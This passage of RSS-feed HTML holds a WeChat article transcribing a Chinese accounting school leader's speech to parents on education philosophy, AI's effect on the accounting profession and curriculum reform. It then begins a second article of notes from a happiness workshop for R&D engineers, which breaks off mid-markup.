style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;color:red;">大学就是：为学生走向社会、持续学习，提供坚实的基础</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:
minor-latin;">。</span><span style="font-family: 宋体;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">我们经常说终身教育、终身学习。企业、行业、职业、岗位变化太快，终身教育，当然成为一个必然的一个趋势。大学的教育一定是为学生的终身学习打下坚实的基础。</span></p><p><span style="font-family: 宋体;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">最牛的人：能力和价值观兼优</span></strong></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">什么是最牛的人？第一个是能力，第二个是价值观。</span><span lang="EN-US"><o:p></o:p></span></p><p><span lang="EN-US">1 </span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:
minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">能力维度，最牛的人才、我们的学生走上社会，<span style="color:red;">遇到他不会的，他都可以自学，解决</span>。最可悲的人是，大学教给他一大堆知识，最后走向社会，社会需求变了，结果他很难适应，知识挺多，但是学习能力很差，那是不行的。</span><span lang="EN-US"><o:p></o:p></span></p><p><span lang="EN-US">2 </span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:
minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">从价值观的维度，我们培养出来的人才，走向社会，无论在世俗的眼里，他混得好还是不能差，混的成功还是不成功，只要他自<span style="color:red;">己内心淡定，充实，幸福，那就足够了</span>。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">实际上，中国的经济社会发展特别改革开放已来的</span><span lang="EN-US">40</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">多年的时间，我们的物质水平是提高了太多太多了，但是我们当中的很多人的幸福感是不是在下降，我们要反思这个事情。我说，如果我们的学生面上看起来他的这个发展的挺好，社会地位也挺高，但如果自己内心不开心幸福，那就是本末倒置。<span style="font-family: 宋体;color: red;">大学培养，就是树立学生正确的价值观，积极向上的一种心态和未来完整完善的人格，这才是我们大学应该做的</span><span></span>。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">能力培养，是社会引领，大学一定要培养满足社会需求的人才。但是我说，价值观的引领，一定是大学引领社会，而不是被带节奏。我们这个社会，其实浮躁、繁杂和不平衡的心态处处可见，如果让社会这种浮躁的状态侵蚀到大学里，让我们每个学生都感到烦躁不安，生怕我这里就是患得患失，这边得到那边没得到，就是我们古代说的不患寡而患不均，那就会有很多问题。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">大学最重要的两件事：运动和读书</span></strong></w:sdt></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">我们今天本来打算播放心理健康中心的一个宣传片，我说：大学里面如果我们对了，学风自然也就对了。我经常说，<span style="color:red;">大学最重要的两件事就是运动和读书</span>。心情郁闷的时候出去跑几圈，出一身汗，马上就没事。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">心理健康中心的老师说，你看现在大学生这个心理问题比例挺高的，但是你会看到，只要愿意运动的小孩怎么样？或者热爱体育的小孩，没有一个有问题。家校共同努力，我现在提醒一下，小孩一定要多锻炼，有好处。现在有手机了，有网络了，很多学生不愿意，连谈恋爱都懒得谈，觉得手机更有乐趣，结果长时间待屋里，很容易出问题。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">人才培养理念：厚基础、宽口径、破门槛</span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></h2><h2>大学的教育一定是在能力培养和人格塑造上，知识学习反而是最低层次的。知识学习之上就是能力的培养和价值观培养、人格的塑造，越到后面越重要。所以说，<span style="font-family: 宋体;color: red;">大学的人才培养的理念就是叫“做后期”</span><span></span>。把未来职业发展中遇到对他来说，自学有难度、有门槛的内容，给他系统学习，把门槛砍掉。那么你跨过这个门槛，遇到问题自然能够自己学习、解决。</h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">以上就是我提的一个大学人才培养的理念，叫：<span style="color:red;">厚基础、宽口径、破门槛。</span></span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">随着新技术新经济的快速发展，未来的人才需求将呈现变化快、不确定性高的特点，与此同时，很多专业的门槛将明显提高。因此，现代大学的人才培养应注重厚基础、宽口径、破门槛的理念，即打牢专业基础、拓展跨专业能力、学习“门槛”知识，进而提升学生的学习能力和创新能力。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">我在</span><span lang="EN-US">2018</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年教学改革的时候说，会计学科，最最核心就五六门，你只要把它学透，学生了之后可以举一反三，遇到任何的会计问题都可以解决，那在此基础上，我说我们开哪些课，不开哪些课。我一个观点，学生走出校园，他能自学的东西少开一点，甚至不开；学生不能自学的我多开一点。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">会计会被人工智能取代么？会计专业人士从信息生成转向信息利用</span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">那未来社会我们的会计的职业怎么发展？在</span><span lang="EN-US">2017</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年的时候，</span><span lang="EN-US">bbc</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">报道了剑桥大学两个教授的一个报告，说在未来十年，哪些职业最容易被人工智能给取代呢？哪些职业会消失呢？而会计很不幸，位列第三，第一个是什么？打字员，第二是接线员，第三是被取代的是会计，被取代的概率是</span><span lang="EN-US">98.7%</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">哇！舆论马上说，做什么会计啊！不需要这些人员呐。德勤等四大，引入了财务机器人，真的慢慢取代了很多人，包括我们附近的长虹，它十年，</span><span lang="EN-US">2008-2018</span><span style="font-family:宋体;mso-ascii-font-family:
Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">财会部门分流了</span><span lang="EN-US">87%</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">的人员。会计未来怎么办呀？</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">张雪峰说，这个世界上两个专业，你永远不用担心，哪两个专业，第一个是计算机，第二个是会计。只要你够厉害，永远他都需要。任何地方都需要财务，更重要的是，如果你不懂会计，我直接发给你一套报表，你能看懂吗？一张也看不懂吗？你照样看不懂这些<span style="color:red;">数字背后的业务逻辑和管理逻辑</span>，你怎么管呀？</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">我说，<span style="font-family: 宋体;color: red;">会计系统，到目前为止，是唯一一个系统反应微观主体财务状况、经营成果和现金流的信息平台，任何的业务数据都取代不了</span><span></span>。我们之前上海银保监局，现在他们改名了，他们领导说，现在的社会舆论完全是误导，如果你不懂会计，你怎么监管？你怎么通过这些数据背后看出逻辑的瑕疵？</span><span lang="EN-US"><o:p></o:p></span></p><p><span lang="EN-US">2017</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:
minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年，任正非说，一个好的企业，想做好的企业，如果你把财务做好，就不可能做不好。所以我想给大家一个概念，那些所谓的被取代，直接是被替代，都是取代的基础核算会计。我不用做账了，但是你如果不懂的话，你怎么管理决策呢？</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">所以说我们未来的<span style="color:red;">会计职业或者会计专业的人士，他的主要功能是什么？从会计信息生成，也就是做账的这个角度，再跳出来是会计信息的利用，他从生成转向利用，有效的利用这些信息进行分析决策。</span>这才是我们未来的发展的一个核心的方向。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">过去我们的会计职业是有限的，有些人一扎进去做账，做到三年，五年，甚至一辈子。怎么样？出不来呀。我说新的人工智能的出现，一下子把这个基础的、繁杂的业务给取代了，我一下子跳出来了，我跨过了这些基础核算的那个阶段，来从事更高层面的分析决策。所以我们用未来来说，我们的<span style="color:red;">传统的会计职业的陷阱，会消失的。人工智能是提高了会计工作的效率，而不是取代，取代的是生成类的工作。</span></span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span style="color:red;"><br/></span></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">人才培养理念：3+1 = </span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">会计财务 数据分析智能决策 战略思维</span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">你去到深圳任何的一个大型企业去看一下，问会计重不重要？他说会计核算相对容易，但是懂会计的真的太少。特别是懂会计又懂数据分析又懂智能决策的人太少。我们的一个概念，第一，不可替代，我会计的功能是变化，第二你也要认识到，未来只懂会计你也不行。这个企业数字化转型、大数据时代来了之后，除了会计信息，是不是还有很多其他的信息啊！我基于这些信息，怎么去分析决策，所以说数据分析的能力一定是非常重要，再者就是智能决策，和计算机编程相关。所以我们提出</span><span lang="EN-US">3+1</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">的培养理念，<span style="color:red;">会计的学生要熟知</span></span><span lang="EN-US" style="color:red;">3</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:
minor-latin;color:red;">种逻辑，即熟知会计与财务逻辑、数据分析逻辑和智能决策逻辑三种逻辑，以及具备战略思维</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:
minor-latin;">。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:
minor-latin;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">教学改革：提升数学难度、打牢发展基础</span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">这几年，我们的改革做了几件事，第一，删减不必要的专业方向课和专业选修课，只保留核心课程；第二，提高数学统计类课程的难度；第三，增加计算机类课程，注重编程原理学习；第四，开发专业与技术相结合的关键课程；就是砍了一些不必要的专业方向课和选入了数据分析和智能决策的课程，提升了数学、统计的难度，一开始有有学生不习惯说，哎！以前学姐学兄很轻松，周末可以爽一下啊！轮到我们了，我们周末还要加班啊！还要学习。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">我说大学是用来系统学习你的知识的，系统提升你的能力的，如果这个时候你不努力，轻轻松松的出去了，你未来几十年很难。我这几年把基础打牢了，所以这个时候呢，我也想给我们家长说，在学生遇到学习有难度的东西，来吐槽的时候，你可以让他吐槽，没关系，可以吐槽同时你要知道，大学就是为未来的持续发展打下坚实的基础，所以这几年我们的课程过去来说难度提高，但是我说一定很好，在过去几年毕业的学生，大家一定是认可的。我<span style="color:red;">大学里面要让学生了解我们的人，才能了解我们未来的方向，这样的话，心中有方向，内在自然就接受</span>。否则他觉得我为什么是这样，我为什么要这样啊！我觉得这个是需要家校联动的地方。</span><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></p><p><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;"><br/></span></strong></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></w:sdt></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">总而言之啊！我想说西财会计，一定是值得你们选择的一个地方，我们也向大家表态，我们无论是专业老师，还是行政辅导员，我们一定会尽全力为我们学生的成长保驾护航。那同时当遇到任何的一些困难、挫折或者问题的时候，我们及时保持沟通，相信在我们共同努力之下，我们的学生一定会健康。谢谢！</span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"></span></p><section><section style="display: inline-block;"><img data-ratio="1" data-type="jpg" data-w="640" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=723d3e8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzc7sO1lwPn3arcb6QHGyP4RUp7BC4enQdxib3HkialaFseCCWG0Jg91jjThBowkvpslvLDm51mTY1w%2F640%3Fwx_fmt%3Djpeg"/></section>​<span style="background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">​</span></section><section><section style="display: inline-block;"><img data-ratio="0.75" data-type="jpg" data-w="1080" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d871fff1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzc7sO1lwPn3arcb6QHGyP41eHK3poFL96ZnRe92R4o5kvHzkamZpH5s9deF4EiaYrKrP6zCjlC5hQ%2F640%3Fwx_fmt%3Djpeg"/></section>​</section><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"></span></p><section><section style="display: inline-block;"><img data-ratio="0.75" data-type="jpg" data-w="1080" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=73d062ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzc7sO1lwPn3arcb6QHGyP4KJFicoODU6dEJQVqGuhP74RKtty6sVrgcvia1CDNK3l8iaV7IjiaEsw8nA%2F640%3Fwx_fmt%3Djpeg"/></section>​</section><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483791">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6125cc24&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483791%26idx%3D1%26sn%3D47ef7220c737fa26a823944d6cf3accd%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 Sep 2023 22:05:00 +0800</pubDate>
    </item>
    <item>
      <title>研发工程师幸福公开课笔记</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483768&amp;idx=1&amp;sn=0d009dd6c81320d1f80cc80969e16dfa</link>
      <description>研发工程师 码上幸福公开课</description>
      <content:encoded><![CDATA[<p>
<span>本自具足</span> <span>2023-08-30 16:09</span> <span style="display: inline-block;">上海</span>
</p>

<p>研发工程师 码上幸福公开课</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=72e13b12&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyVabfacHjicW57dmTTibQ9f7xWRgKpvRibkbUyuj88qZmSDicOgtNK5xJ7thzVejtP34q47FDlHGeVjg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#14324D;mso-font-kerning:18.0pt;">背景和感受<o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:red;mso-font-kerning:0pt;">圈子是幸福的链接，本场也是幸福的记忆。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:red;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><strong><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">Ivy</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">组织了一次针对研发工程师的幸福公开课。Ivy风华正茂，热情奔放，组成这个大咖局；在主持的衔接环节，旁征博引，如天女散花。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><strong><span lang="EN-US" style="font-size:11.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">Alan</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">牛老师作为研发工程师的代表。内心充实，纯真、不做作；总结研发工作特点很到位。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">水哥、Andy、Michelle、Lisa、阿芹</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">作为“幸福教练”。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:微软雅黑;color:black;mso-font-kerning:0pt;">-Michelle、Lisa、阿芹的分享，淡定从容，妙音亲和，温馨解压。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:微软雅黑;color:black;mso-font-kerning:0pt;">-Andy则直指人心，当头棒喝，引人顿悟。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:微软雅黑;color:black;mso-font-kerning:0pt;">-水哥有军人风范，一板一眼，拳拳少壮。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
